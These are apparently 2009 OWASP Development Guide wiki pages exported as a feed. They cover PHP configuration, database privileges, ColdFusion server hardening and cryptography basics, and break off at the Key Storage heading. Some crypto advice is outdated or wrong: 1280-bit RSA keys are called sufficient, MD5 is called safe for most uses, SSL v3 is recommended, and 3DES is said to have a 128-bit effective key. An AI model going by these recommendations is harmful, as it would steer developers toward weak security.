Another solution would be to have as little code as possible in global scope. Object oriented programming (OOP) is a real beauty when done right and I would highly recommend you to take that approach. We could write almost all our code in classes that is generally safer and promotes reuse. Like we never should assume that register_globals is off, we should never assume it is on. The correct way to get input from GET, POST, COOKIE etc. is to use the superglobals that were added in PHP version 4.1.0. These are the $_GET, $_POST, $_ENV, $_SERVER, $_COOKIE, $_REQUEST $_FILES, and $_SESSION arrays. The term superglobals is used since they are always available without regard to scope.&lt;br /&gt;
&lt;br /&gt;
'''register_globals '''&lt;br /&gt;
&lt;br /&gt;
If set PHP will create global variables from all user input coming from get, post and cookie. If you have the opportunity to turn off this directive you should definitely do so. Unfortunately there is so much code out there that uses it so you are lucky if you can get away with it. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''safe_mode '''&lt;br /&gt;
&lt;br /&gt;
The PHP safe mode includes a set of restrictions for PHP scripts and can really increase the security in a shared server environment. To name a few of these restrictions: A script can only access/modify files and folders which has the same owner as the script itself. Some functions/operators are completely disabled or restricted, like the backtick operator. &lt;br /&gt;
&lt;br /&gt;
'''disable_functions '''&lt;br /&gt;
&lt;br /&gt;
This directive can be used to disable functions of our choosing. &lt;br /&gt;
&lt;br /&gt;
'''open_basedir '''&lt;br /&gt;
&lt;br /&gt;
Restricts PHP so that all file operations are limited to the directory set here and its subdirectories. &lt;br /&gt;
&lt;br /&gt;
'''allow_url_fopen '''&lt;br /&gt;
&lt;br /&gt;
With this option set PHP can operate on remote files with functions like include and fopen. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''error_reporting '''&lt;br /&gt;
&lt;br /&gt;
We want to write as clean code as possible and thus we want PHP to throw all warnings, etc. at us. &lt;br /&gt;
&lt;br /&gt;
Recommended: E_ALL &lt;br /&gt;
&lt;br /&gt;
'''log_errors '''&lt;br /&gt;
&lt;br /&gt;
Logs all errors to a location specified in php.ini. &lt;br /&gt;
&lt;br /&gt;
Recommended: on &lt;br /&gt;
&lt;br /&gt;
'''display_errors '''&lt;br /&gt;
&lt;br /&gt;
With this directive set, all errors that occur during the execution of scripts, with respect to error_reporting, will be sent to the browser. This is desired in a development environment but not on a production server, since it could expose sensitive information about our code, database or web server. &lt;br /&gt;
&lt;br /&gt;
Recommended: off (production), on (development) &lt;br /&gt;
&lt;br /&gt;
'''magic_quotes_gpc '''&lt;br /&gt;
&lt;br /&gt;
Escapes all input coming in from post, get and cookie. This is something we should handle on our own. &lt;br /&gt;
&lt;br /&gt;
This also applies to '''magic_quotes_runtime'''. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''post_max_size, upload_max_filesize and memory_limit '''&lt;br /&gt;
&lt;br /&gt;
These directives should be set at a reasonable level to reduce the risk of resource starvation attacks.&lt;br /&gt;
&lt;br /&gt;
==Database security ==&lt;br /&gt;
&lt;br /&gt;
Data obtained from the user needs to be stored securely. In nearly every application, insufficient care is taken to ensure that data cannot be obtained from the database itself.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application connect to the database using low privilege users? &lt;br /&gt;
&lt;br /&gt;
* Are there different database connection users for application administration and normal user activities? If not, why not?&lt;br /&gt;
&lt;br /&gt;
* Does the application make use of safer constructs, such as stored procedures which do not require direct table access?&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** Is the database is on another host? Is that host locked down? &lt;br /&gt;
** All patches deployed and latest database software in use?&lt;br /&gt;
** Does the application connect to the database using an encrypted link? If not, is the application server and database server in a restricted network with minimal other hosts, particularly untrusted hosts like desktop workstations?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database using as low privilege user as is possible.&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database with different credentials for every trust distinction (e.g., user, read-only user, guest, administrators) and permissions applied to those tables and databases to prevent unauthorized access and modification.&lt;br /&gt;
&lt;br /&gt;
* The application should prefer safer constructs, such as stored procedures which do not require direct table access. Once all access is through stored procedures, access to the tables should be revoked.&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** The database should be on another host, which should be locked down with all current patches deployed and latest database software in use.&lt;br /&gt;
** The application should connect to the database using an encrypted link. If not, the application server and database server must reside in a restricted network with minimal other hosts. &lt;br /&gt;
** Do not deploy the database server in the main office network.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ITIL – Change Management http://www.itil.org.uk/&lt;br /&gt;
&lt;br /&gt;
==ColdFusion Components (CFCs) ==&lt;br /&gt;
&lt;br /&gt;
This section provides guidance on using ColdFusion components (CFCs) without exposing your web application to unnecessary risk.  ColdFusion provides two ways of restricting access to CFCs; role-based security and access control.&lt;br /&gt;
&lt;br /&gt;
Role-based security is implemented by the '''''roles''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The attribute contains a comma-delimited list of security roles that can call this method.&lt;br /&gt;
&lt;br /&gt;
Access control is implemented by the '''''access''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The possible values of the attribute in order of most restricted behavior are: private (strongest), package, public (default), and remote (weakest).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Private:''' The method is accessible only to methods within the same component. This is similar to the Object Oriented Programming (OOP) private identifier.&lt;br /&gt;
&lt;br /&gt;
'''Package:'''  The method is accessible only to other methods within the same package. This is similar to the OOP protected static identifier.&lt;br /&gt;
&lt;br /&gt;
'''Public:''' The method is accessible to any CFC or CFM on the same server. This is similar to the OOP public static identifier.&lt;br /&gt;
&lt;br /&gt;
'''Remote:''' Allows all the privileges of public, in addition to accepting remote requests from HTML forms, Flash, or a web services. This option is required, to publish the function as a web service.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Do not use THIS scope inside a component to expose properties. Use a getter or setter function instead.  For example, instead of using THIS.myVar create a public function that sets the variable (i.e. setMyVar(value)).&lt;br /&gt;
&lt;br /&gt;
*Do not omit the role attribute as ColdFusion will not restrict user access to the function.&lt;br /&gt;
&lt;br /&gt;
*Avoid using Access=”Remote” if you do not intend to call the component directly from a URL.&lt;br /&gt;
&lt;br /&gt;
==Configuration ==&lt;br /&gt;
&lt;br /&gt;
The following section describes some of the server-wide security-related options available to a ColdFusion administrator via the ColdFusion MX 7 Administrator console web application (http://servername:port/CFIDE/administrator/index.cfm). If the console application is unavailable, you can modify these options by editing the XML files in the cf_root/lib/ (Server configuration) or cf_web_root/WEB-INF/cfusion/lib (J2EE configuration) directory; however, editing these files directly is not recommended.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice '''&lt;br /&gt;
&lt;br /&gt;
*CF Admin Password screen&lt;br /&gt;
&lt;br /&gt;
*Enable a strong Administrator password&lt;br /&gt;
**'''The ColdFusion Administrator is the default interface for configuring the ColdFusion application server. It is secured by a single password. Ensure that the Administrator security is enabled and the password is strong and stored in a secure place.'''&lt;br /&gt;
**Ensure the checkbox is filled&lt;br /&gt;
**Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
**Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox Security screen'''&lt;br /&gt;
&lt;br /&gt;
Enable Sandbox Security&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''The ColdFusion Sandbox allows you to place access security restrictions on files, directories, methods, and data sources.  Sandboxes make the most sense for a hosting provider or corporate intranet where multiple applications share the same server. Enable this option.'''&lt;br /&gt;
&lt;br /&gt;
'''Next, a sandbox needs to be configured, because if not all code in all directories will execute without restriction.  Code in a directory and its subdirectories inherits the access controls defined for the sandbox.  For example, if ABC Company creates multiple applications within their directory all applications will have the same permissions as the parent.  A sandbox applied to ABC-apps will apply to app1 and app2.  A sample directory structure is shown below:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app1'''&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app2'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Note: if a new sandbox is created for app2 then it will not inherit settings from ABC-apps.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox security configurations are application specific; however, there are general guidelines that should be followed:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create a default restricted sandbox and copy setting to each subsequent sandbox removing restrictions as needed by the application.  Except in the case of files/directories where access is granted rather than restricted.&lt;br /&gt;
&lt;br /&gt;
Restrict access to data sources that should not be accessed by the sandboxed application.&lt;br /&gt;
&lt;br /&gt;
Restrict access to powerful tags, for example CFREGISTRY and CFEXECUTE.&lt;br /&gt;
&lt;br /&gt;
Restrict file and directory access to limit the ability of tags and functions to perform actions to specified paths.&lt;br /&gt;
&lt;br /&gt;
'''''Every''''' application should have a sandbox.&lt;br /&gt;
&lt;br /&gt;
In multi-homed environments disable Java Server Pages (JSP) as ColdFusion is unable to restrict the functionality of the underlying Java server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RDS Password screen'''&lt;br /&gt;
&lt;br /&gt;
Enable a strong RDS password&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Developers can access ColdFusion resources (files and data sources) over HTTP from Macromedia Dreamweaver MX and HomeSite+ through ColdFusion’s Remote Development Services (RDS). This feature is password protected should only be enabled in secure development environments.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensure the checkbox is filled&lt;br /&gt;
&lt;br /&gt;
Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
&lt;br /&gt;
Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use RDS over SSL - During development, you should use SSL v3 to encrypt all RDS communications between Dreamweaver MX and the ColdFusion server. This includes remote access to server data sources and drives, provided that both are accessed through RDS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable RDS in Production&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''In production environments, you should not use RDS. In earlier versions of ColdFusion, RDS ran as a separate service or process and could be disabled by disabling the service. In ColdFusion MX, RDS is integrated into the main service. To disable it, you must disable the RDSServlet mapping in the web.xml file. The following procedure assumes that ColdFusion is installed in the default location.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''1.	Back up the C:\CFusionMX7\wwwroot\WEB-INF\web.xml file.'''&lt;br /&gt;
&lt;br /&gt;
'''2.	Open the web.xml file for editing.'''&lt;br /&gt;
&lt;br /&gt;
'''3.	Comment out the RDSServlet mapping, as follows:'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;!—'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-mapping&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-name&amp;gt;RDSServlet&amp;lt;/servlet-name&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;url-pattern&amp;gt;/CFIDE/main/ide.cfm&amp;lt;/url-pattern&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;/servlet-mapping&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''--&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''4.	Save the file.'''&lt;br /&gt;
&lt;br /&gt;
'''5.	Restart ColdFusion.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Settings Screen&lt;br /&gt;
&lt;br /&gt;
Enable a Request Timeout&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion processes requests simultaneously and queues all requests above the configured maximum number of simultaneous requests. If requests run abnormally long, this can tie up server resources and lead to DoS attacks. This setting will terminate requests when the configured timeout is reached.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Fill the checkbox next to “Timeout Request after (seconds)”&lt;br /&gt;
&lt;br /&gt;
Enter the number of seconds for ColdFusion to allow threads to run&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To allow a valid template request to run beyond the configured timeout, place a &amp;lt;cfsetting&amp;gt; atop the base ColdFusion template and configure the RequestTimeout attribute for the necessary amount of time (in seconds).'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use UUID for cftoken&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best practice calls for J2EE session management. In the event that only ColdFusion session management is available, strong security identifiers must be used. Enable this setting to change the default 8-character CFToken security token string to a UUID.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable Global Script Protection - This is a new security feature in ColdFusion MX 7 that isn’t available in other web application platforms. It helps protect Form, URL, CGI, and Cookie scope variables from cross-site scripting attacks. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Site-wide Error Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Prevent information leaks through verbose error messages. Specifying a site-wide error handler covers you when cftry/cfcatch are not used. This page should be a generic error message that you return to the user. Also, if the error handler displays user-input, it should be reviewed for potential cross-site scripting issues.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Missing Template Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Provide a custom message page for HTTP 404 errors when the server cannot find the requested ColdFusion template.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configure a memory throttling &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To prevent file upload DoS attacks, Macromedia added new configuration settings to ColdFusion MX 7.0.1 that allow administrators to restrict the total upload size of HTTP POST operations. Configure these settings accordingly.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
maximum size for post data&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This is the total size that ColdFusion will accept for any single HTTP POST request (including file uploads). ColdFusion will reject any request whose Content-size header exceeds this setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Threshold &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''HTTP POST requests larger than this setting (default is 4MB) are included in the total concurrent request memory size and get queued if they exceed the Request Throttle Memory setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Memory &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This sets the total amount of memory (MB) ColdFusion reserves for concurrent HTTP POST requests. Any requests exceeding this limit are queued until enough memory is available. '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Memory Variables screen'''&lt;br /&gt;
&lt;br /&gt;
Enable J2EE Session Management and Use J2EE session variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Best practice requires J2EE sessions because they are more secure than regular ColdFusion sessions. (See Session Management section)&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable Session Variables”&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable J2EE session variables”&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum session timeout to 20 minutes to limit the window of opportunity for session hijacking.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default session timeout to 20 minutes to limit the window of opportunity for session hijacking. (The default value is 20 minutes.)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The session-timeout parameter in the cf_root/WEB-INF/web.xml file establishes the maximum J2EE session timeout. This setting should always be greater-than or equal-to ColdFusion’s Maximum Session Timeout value.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum application timeout to 24 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default application timeout to 8 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Sources screen'''&lt;br /&gt;
&lt;br /&gt;
Do not use an administrative account to connect ColdFusion to a data source. For example, do not use SA account to connect to a MS SQL Server. The account accessing the database should be granted specific privileges to the objects it needs to access. In addition, the account created to connect the database should be an OS-based, not a SQL account. Operating system accounts have many more auditing, password, and other security controls associated with them.  For example, account lockouts and password complexity requirements are built into the Windows operating system; however, a database would need custom code to handle these security-related tasks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable the following Allowed SQL options for all data sources:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create&lt;br /&gt;
&lt;br /&gt;
Drop&lt;br /&gt;
&lt;br /&gt;
Grant&lt;br /&gt;
&lt;br /&gt;
Revoke&lt;br /&gt;
&lt;br /&gt;
Alter&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''As an administrator, you do not have control over what a developer sends to the database; however, there should be no circumstance where the previous commands need to be sent to a database from a web application.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging Settings screen'''&lt;br /&gt;
&lt;br /&gt;
Disable Robust Exception for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable Debugging for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging IP Addresses'''&lt;br /&gt;
&lt;br /&gt;
Ensure only the addresses of trusted clients are in the IP list.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Only allow the localhost IP (127.0.0.1) in the list on production machines&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Mail screen'''&lt;br /&gt;
&lt;br /&gt;
Require a user name and password to authenticate to your mail server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the connection timeout to 60 seconds (The default value is 60 seconds.)&lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity|Secure Lifecycle]]&lt;br /&gt;
[[category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59967</id>
		<title>Guide to Cryptography</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59967"/>
				<updated>2009-05-03T16:01:14Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* How to determine if you are vulnerable */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that cryptography is safely used to protect the confidentiality and integrity of sensitive user data.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS5.18 – Cryptographic key management&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Initially confined to the realms of academia and the military, cryptography has become ubiquitous thanks to the Internet. Common every day uses of cryptography include mobile phones, passwords, SSL, smart cards, and DVDs. Cryptography has permeated everyday life, and is heavily used by many web applications.&lt;br /&gt;
&lt;br /&gt;
Cryptography (or crypto) is one of the more advanced topics of information security, and one whose understanding requires the most schooling and experience. It is difficult to get right because there are many approaches to encryption, each with advantages and disadvantages that need to be thoroughly understood by web solution architects and developers.  In addition, serious cryptography research is typically based in advanced mathematics and number theory, providing a serious barrier to entry. &lt;br /&gt;
&lt;br /&gt;
The proper and accurate implementation of cryptography is extremely critical to its efficacy. A small mistake in configuration or coding will result in removing a large degree of the protection it affords and rending the crypto implementation useless against serious attacks.&lt;br /&gt;
&lt;br /&gt;
A good understanding of crypto is required to be able to discern between solid products and snake oil. The inherent complexity of crypto makes it easy to fall for fantastic claims from vendors about their product. Typically, these are “a breakthrough in cryptography” or “unbreakable” or provide &amp;quot;military grade&amp;quot; security. If a vendor says &amp;quot;trust us, we have had experts look at this,” chances are they weren't experts!&lt;br /&gt;
&lt;br /&gt;
==Cryptographic Functions ==&lt;br /&gt;
&lt;br /&gt;
Cryptographic systems can provide one or more of the following four services. It is important to distinguish between these, as some algorithms are more suited to particular tasks, but not to others.&lt;br /&gt;
&lt;br /&gt;
When analyzing your requirements and risks, you need to decide which of these four functions should be used to protect your data.&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Using a cryptographic system, we can establish the identity of a remote user (or system). A typical example is the SSL certificate of a web server providing proof to the user that he or she is connected to the correct server.&lt;br /&gt;
&lt;br /&gt;
The identity is not of the user, but of the cryptographic key of the user. Having a less secure key lowers the trust we can place on the identity.&lt;br /&gt;
&lt;br /&gt;
===Non-Repudiation ===&lt;br /&gt;
&lt;br /&gt;
The concept of non-repudiation is particularly important for financial or e-commerce applications. Often, cryptographic tools are required to prove that a unique user has made a transaction request. It must not be possible for the user to refute his or her actions.&lt;br /&gt;
&lt;br /&gt;
For example, a customer may request a transfer of money from her account to be paid to another account. Later, she claims never to have made the request and demands the money be refunded to the account. If we have non-repudiation through cryptography, we can prove – usually through digitally signing the transaction request, that the user authorized the transaction.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
More commonly, the biggest concern will be to keep information private. Cryptographic systems were originally developed to function in this capacity. Whether it be passwords sent during a log on process, or storing confidential medical records in a database, encryption can assure that only users who have access to the appropriate key will get access to the data.&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
We can use cryptography to provide a means to ensure data is not viewed or altered during storage or transmission. Cryptographic hashes for example, can safeguard data by providing a secure checksum.&lt;br /&gt;
&lt;br /&gt;
==Cryptographic Algorithms ==&lt;br /&gt;
&lt;br /&gt;
Various types of cryptographic systems exist that have different strengths and weaknesses. Typically, they are divided into two classes; those that are strong, but slow to run and those that are quick, but less secure. Most often a combination of the two approaches is used (e.g.: SSL), whereby we establish the connection with a secure algorithm, and then if successful, encrypt the actual transmission with the weaker, but much faster algorithm.&lt;br /&gt;
&lt;br /&gt;
===Symmetric Cryptography ===&lt;br /&gt;
&lt;br /&gt;
Symmetric Cryptography is the most traditional form of cryptography.  In a symmetric cryptosystem, the involved parties share a common secret (password, pass phrase, or key). Data is encrypted and decrypted using the same key. These algorithms tend to be comparatively fast, but they cannot be used unless the involved parties have already exchanged keys.  Any party possessing a specific key can create encrypted messages using that key as well as decrypt any messages encrypted with the key.  In systems involving a number of users who each need to set up independent, secure communication channels symmetric cryptosystems can have practical limitations due to the requirement to securely distribute and manage large numbers of keys.&lt;br /&gt;
&lt;br /&gt;
Common examples of symmetric algorithms are DES, 3DES and AES. The 56-bit keys used in DES are short enough to be easily brute-forced by modern hardware and DES should no longer be used.  Triple DES (or 3DES) uses the same  algorithm, applied three times with different keys giving it an effective key length of 128 bits.  Due to the problems using the DES alrgorithm, the United States National Institute of Standards and Technology (NIST) hosted a selection process for a new algorithm.  The winning algorithm was Rijndael and the associated cryptosystem is now known as the Advanced Encryption Standard or AES.  For most applications 3DES is acceptably secure at the current time, but for most new applications it is advisable to use AES.&lt;br /&gt;
&lt;br /&gt;
===Asymmetric Cryptography (also called Public/Private Key Cryptography) ===&lt;br /&gt;
&lt;br /&gt;
Asymmetric algorithms use two keys, one to encrypt the data, and either key to decrypt. These inter-dependent keys are generated together. One is labeled the Public key and is distributed freely. The other is labeled the Private Key and must be kept hidden.&lt;br /&gt;
&lt;br /&gt;
Often referred to as Public/Private Key Cryptography, these cryptosystems can provide a number of different functions depending on how they are used. &lt;br /&gt;
&lt;br /&gt;
The most common usage of asymmetric cryptography is to send messages with a guarantee of confidentiality.  If User A wanted to send a message to User B, User A would get access to User B’s publicly-available Public Key.  The message is then encrypted with this key and sent to User B.  Because of the cryptosystem’s property that messages encoded with the Public Key of User B can only be decrypted with User B’s Private Key, only User B can read the message.&lt;br /&gt;
&lt;br /&gt;
Another usage scenario is one where User A wants to send User B a message and wants User B to have a guarantee that the message was sent by User A.  In order to accomplish this, User A would encrypt the message with their Private Key.  The message can then only be decrypted using User A’s Public Key.  This guarantees that User A created the message Because they are then only entity who had access to the Private Key required to create a message that can be decrcrypted by User A’s Public Key.  This is essentially a digital signature guaranteeing that the message was created by User A.&lt;br /&gt;
&lt;br /&gt;
A Certificate Authority (CA), whose public certificates are installed with browsers or otherwise commonly available, may also digitally sign public keys or certificates. We can authenticate remote systems or users via a mutual trust of an issuing CA. We trust their ‘root’ certificates, which in turn authenticate the public certificate presented by the server.[[Category:FIXME|seems like there should be a noun after &amp;quot;avialable&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
PGP and SSL are prime examples of a systems implementing asymmetric cryptography, using RSA or other algorithms.&lt;br /&gt;
&lt;br /&gt;
===Hashes ===&lt;br /&gt;
&lt;br /&gt;
Hash functions take some data of an arbitrary length (and possibly a key or password) and generate a fixed-length hash based on this input. Hash functions used in cryptography have the property that it is easy to calculate the hash, but difficult or impossible to re-generate the original input if only the hash value is known.  In addition, hash functions useful for cryptography  have the property that it is difficult to craft an initial input such that the hash will match a specific desired value.&lt;br /&gt;
&lt;br /&gt;
MD5 and SHA-1 are common hashing algorithms used today. These algorithms are considered weak (see below) and are likely to be replaced after a process similar to the AES selection. New applications should consider using SHA-256 instead of these weaker algorithms.&lt;br /&gt;
&lt;br /&gt;
===Key Exchange Algorithms ===&lt;br /&gt;
&lt;br /&gt;
Lastly, we have key exchange algorithms (such as Diffie-Hellman for SSL). These allow use to safely exchange encryption keys with an unknown party. &lt;br /&gt;
&lt;br /&gt;
==Algorithm Selection ==&lt;br /&gt;
&lt;br /&gt;
As modern cryptography relies on being computationally expensive to break, specific standards can be set for key sizes that will provide assurance that with today’s technology and understanding, it will take too long to decrypt a message by attempting all possible keys.&lt;br /&gt;
&lt;br /&gt;
Therefore, we need to ensure that both the algorithm and the key size are taken into account when selecting an algorithm.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Proprietary encryption algorithms are not to be trusted as they typically rely on ‘security through obscurity’ and not sound mathematics. These algorithms should be avoided if possible.&lt;br /&gt;
&lt;br /&gt;
Specific algorithms to avoid:&lt;br /&gt;
&lt;br /&gt;
* MD5 has recently been found less secure than previously thought. While still safe for most applications such as hashes for binaries made available publicly, secure applications should now be migrating away from this algorithm.&lt;br /&gt;
&lt;br /&gt;
* SHA-0 has been conclusively broken. It should no longer be used for any sensitive applications.&lt;br /&gt;
&lt;br /&gt;
* SHA-1 has been reduced in strength and we encourage a migration to SHA-256, which implements a larger key size.&lt;br /&gt;
&lt;br /&gt;
* DES was once the standard crypto algorithm for encryption; a normal desktop machine can now break it. AES is the current preferred symmetric algorithm.&lt;br /&gt;
&lt;br /&gt;
Cryptography is a constantly changing field. As new discoveries in cryptanalysis are made, older algorithms will be found unsafe. In addition, as computing power increases the feasibility of brute force attacks will render other cryptosystems or the use of certain key lengths unsafe. Standard bodies such as NIST should be monitored for future recommendations. &lt;br /&gt;
&lt;br /&gt;
Specific applications, such as banking transaction systems, may have specific requirements for algorithms and key sizes.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assuming you have chosen an open, standard algorithm, the following recommendations should be considered when reviewing algorithms:&lt;br /&gt;
&lt;br /&gt;
'''Symmetric:'''&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
* Consider 168 or 256 bits for secure systems such as large financial transactions&lt;br /&gt;
&lt;br /&gt;
'''Asymmetric:'''&lt;br /&gt;
&lt;br /&gt;
The difficulty of cracking a 2048 bit key compared to a 1024 bit key is far, far, far, more than the twice you might expect. Don’t use excessive key sizes unless you know you need them. Bruce Schneier in 2002 (see the references section) recommended the following key lengths for circa 2005 threats:&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 1280 bits are sufficient for most personal applications&lt;br /&gt;
&lt;br /&gt;
* 1536 bits should be acceptable today for most secure applications&lt;br /&gt;
&lt;br /&gt;
* 2048 bits should be considered for highly protected applications.&lt;br /&gt;
&lt;br /&gt;
'''Hashes:'''&lt;br /&gt;
&lt;br /&gt;
* Hash sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
* Consider 168 or 256 bits for secure systems, as many hash functions are currently being revised (see above).&lt;br /&gt;
&lt;br /&gt;
NIST and other standards bodies will provide up to date guidance on suggested key sizes.&lt;br /&gt;
&lt;br /&gt;
'''Design your application to cope with new hashes and algorithms'''&lt;br /&gt;
&lt;br /&gt;
==Key Storage ==&lt;br /&gt;
&lt;br /&gt;
